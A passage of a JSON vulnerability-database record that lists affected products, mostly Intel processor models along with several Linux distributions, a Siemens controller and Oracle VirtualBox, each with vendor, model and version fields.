        "model": "xeon e3 1270 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620lm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2960xm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5518"
      },
      {
        "_id": null,
        "model": "xeon e5 2448l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5520"
      },
      {
        "_id": null,
        "model": "xeon e3 1240l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120t"
      },
      {
        "_id": null,
        "model": "xeon e3 1268l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2830"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "650"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3537u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3720qm"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3700"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4202y"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "990x"
      },
      {
        "_id": null,
        "model": "xeon bronze 3106",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200y"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y70"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3110m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5575r"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8600k"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5660"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2805"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870_v2"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5118"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8650u"
      },
      {
        "_id": null,
        "model": "xeon e3 1220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2537m"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3520"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "880"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3225"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5630"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2418l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5620"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2617m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v4"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6132"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6260u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210m"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v5"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2620m"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775d"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2649m"
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7500u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2603",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712mq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500k"
      },
      {
        "_id": null,
        "model": "xeon e5 2407 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2435m"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4108"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3439y"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702ec"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "15"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750"
      },
      {
        "_id": null,
        "model": "xeon e3 1505l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330t"
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4910mq"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2900"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770d"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6585r"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2438l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2440 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350h"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3590"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850_v2"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250t"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6146"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3558"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7600u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2665"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370t"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3850"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5618"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2430 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v4"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176"
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3670"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4648_v3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607"
      },
      {
        "_id": null,
        "model": "xeon e3 1246 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160t"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7285"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4109t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100t"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735g"
      },
      {
        "_id": null,
        "model": "simatic winac rtx \\",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2010"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3950"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2880_v2"
      },
      {
        "_id": null,
        "model": "xeon e3 1278l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5119t"
      },
      {
        "_id": null,
        "model": "xeon e5 2403 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820eq"
      },
      {
        "_id": null,
        "model": "xeon e3 1230l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4012y"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150t"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100te"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v4"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5250u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940xm"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2750"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2520m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2105"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500te"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6128"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710hq"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2430",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1558l_v5"
      },
      {
        "_id": null,
        "model": "xeon e3 1290",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.2.0"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700hq"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2357m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4158u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4102e"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3450"
      },
      {
        "_id": null,
        "model": "xeon e5 2407",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5672"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qe"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100u"
      },
      {
        "_id": null,
        "model": "xeon e5 1680 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350t"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126f"
      },
      {
        "_id": null,
        "model": "xeon e-1105c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8837"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5557u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4422e"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6510"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v4"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3050"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134"
      },
      {
        "_id": null,
        "model": "xeon e3 12201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402ec"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142f"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2115c"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2675qm"
      },
      {
        "_id": null,
        "model": "xeon e5 2640",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4000m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4288u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2640m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2540m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370"
      },
      {
        "_id": null,
        "model": "xeon e3 1225",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v2"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3430"
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8894_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148f"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3445"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610me"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4025u"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3710"
      },
      {
        "_id": null,
        "model": "atom x7-e3950",
